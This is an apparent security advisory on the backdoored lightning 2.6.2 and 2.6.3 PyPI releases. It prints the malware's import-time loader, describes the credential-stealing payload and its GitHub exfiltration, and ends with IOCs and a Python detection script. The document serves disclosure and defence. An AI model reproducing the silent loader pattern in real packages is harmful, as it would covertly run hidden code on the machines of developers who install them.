Apr 30, 2026 • 5 min
Mini Shai-Hulud Jumps to PyPI: Lightning Package Backdoored to Drain Developer Credentials
The Mini Shai-Hulud campaign expanded beyond npm on April 30, targeting the PyPI lightning package. Two malicious versions silently harvest credentials, cloud secrets, and cryptocurrency wallets from developer machines.
Overview
On April 30, the Mini Shai-Hulud campaign made its first known move onto PyPI. The target is lightning, a Python framework widely used in the machine-learning community for building and training PyTorch models. Versions 2.6.2 and 2.6.3 were published with embedded malware that activates on import, harvesting credentials, cloud secrets, and cryptocurrency wallets without any visible indication. Any machine that loaded either version should be treated as fully compromised.
This is the third incident attributed to the campaign, following earlier attacks against the Bitwarden CLI npm package and four SAP npm packages. Moving onto PyPI substantially widens the attacker's reach: lightning runs on developer laptops, research workstations, and GPU-backed CI environments — all of which tend to hold high-value secrets.
Injection Point
The malicious code is embedded in __init__.py, Python's package entry point — meaning it runs at import time, before any user code executes and before the calling application has a chance to check anything. A background daemon thread is started immediately to launch the hidden payload bundled inside the package:
import os
import subprocess
import sys
import threading

def _run_runtime() -> None:
    # Locate the second stage bundled inside the package directory
    _runtime_dir = os.path.join(os.path.dirname(__file__), "_runtime")
    _start = os.path.join(_runtime_dir, "start.py")
    if os.path.exists(_start):
        # Launch it as a separate child process with all output discarded
        subprocess.Popen(
            [sys.executable, _start],
            cwd=_runtime_dir,
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
        )

# Daemon thread so the loader never blocks or visibly delays the import
threading.Thread(target=_run_runtime, daemon=True).start()
Delivery
start.py is a cross-platform bootstrapper that fingerprints the OS and CPU architecture, fetches Bun v1.3.13 from GitHub Releases if not already present, and hands execution to router_runtime.js — an 11 MB compiled payload. The same two-stage Bun bootstrapping pattern appeared in both the Bitwarden and SAP incidents, pointing to shared infrastructure across the campaign.
Payload
The payload sweeps a broad range of targets. Developer credentials include SSH keys, shell histories (bash, zsh, Python, Node, MySQL, psql), .env files, git credentials, npm tokens, and MCP configs. Cloud provider files from AWS, GCP, and Azure are collected alongside Kubernetes and Helm configs and Docker credentials. On machines with cryptocurrency software, wallet data is lifted from Bitcoin, Litecoin, Monero, Dogecoin, Dash, Exodus, Atomic, and Ledger. VPN credentials from NordVPN, ProtonVPN, CyberGhost, Windscribe, and OpenVPN are taken, along with Discord and Slack session tokens.
Exfiltration
Stolen data is RSA-2048 encrypted before it leaves the machine and is then pushed to attacker-controlled public GitHub repositories, so the outbound traffic blends in with normal developer activity and is hard to distinguish at the network level.
Remediation
Upgrade to lightning==2.6.4 or later immediately. For any machine that ran the affected versions, rotate all credentials that were present: cloud access keys, SSH keys, API tokens, and any secrets stored in .env files. Check for unexpected GitHub activity and review running processes for instances of Bun.
IOCs
Affected packages
lightning==2.6.2 · lightning==2.6.3
File hashes
router_runtime.js SHA256 5f5852b5f604369945118937b058e49064612ac69826e0adadca39a357dfb5b1
start.py SHA256 8046a11187c135da6959862ff3846e99ad15462d2ec8a2f77a30ad53ebd5dcf2
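A host-side sweep built from the indicators above, added here as an example rather than the advisory's own tooling: it flags an installed lightning package whose version, bundled _runtime/ directory, file hashes, or import-time loader shape in __init__.py matches the campaign. The LOADER_MARKERS heuristic and the constructed fixture in demo() are my own assumptions, not indicators from the advisory.

```python
import hashlib
import importlib.metadata
import tempfile
from pathlib import Path

MALICIOUS_VERSIONS = {"2.6.2", "2.6.3"}  # versions and hashes quoted from the advisory
IOC_SHA256 = {
    "router_runtime.js": "5f5852b5f604369945118937b058e49064612ac69826e0adadca39a357dfb5b1",
    "start.py": "8046a11187c135da6959862ff3846e99ad15462d2ec8a2f77a30ad53ebd5dcf2",
}
LOADER_MARKERS = ("_runtime", "subprocess.Popen", "threading.Thread")  # assumed heuristic

def scan_package_dir(pkg_dir, version=None):
    """Return findings for one lightning package directory; an empty list means nothing matched."""
    pkg_dir, findings = Path(pkg_dir), []
    if version in MALICIOUS_VERSIONS:
        findings.append(f"known-malicious version {version}")
    runtime_dir = pkg_dir / "_runtime"  # where the bundled second stage is dropped
    if runtime_dir.is_dir():
        findings.append("unexpected _runtime/ directory")
        for name, ioc in IOC_SHA256.items():
            f = runtime_dir / name
            if f.is_file() and hashlib.sha256(f.read_bytes()).hexdigest() == ioc:
                findings.append(f"IOC hash match: {name}")
    init = pkg_dir / "__init__.py"
    if init.is_file() and all(m in init.read_text(errors="replace") for m in LOADER_MARKERS):
        findings.append("import-time loader pattern in __init__.py")
    return findings

def scan_installed():
    """Scan every lightning distribution visible to this interpreter (path -> findings)."""
    out = {}
    for dist in importlib.metadata.distributions():
        try:
            name = (dist.metadata["Name"] or "").lower()
        except Exception:  # skip broken or partial installs rather than abort the sweep
            continue
        if name == "lightning":
            pkg_dir = Path(str(dist.locate_file("lightning")))
            out[str(pkg_dir)] = scan_package_dir(pkg_dir, dist.version)
    return out

def demo():
    """Constructed fixture: a fake 2.6.2 tree with the loader's shape but harmless contents."""
    root = Path(tempfile.mkdtemp()) / "lightning"
    (root / "_runtime").mkdir(parents=True)
    (root / "_runtime" / "start.py").write_text("print('constructed placeholder')\n")
    (root / "__init__.py").write_text(
        "import subprocess, threading\n# shape: threading.Thread -> subprocess.Popen(_runtime)\n")
    return scan_package_dir(root, "2.6.2")
```

Run scan_installed() in every interpreter and virtual environment on the host, including CI runners, since each one resolves lightning from its own site-packages.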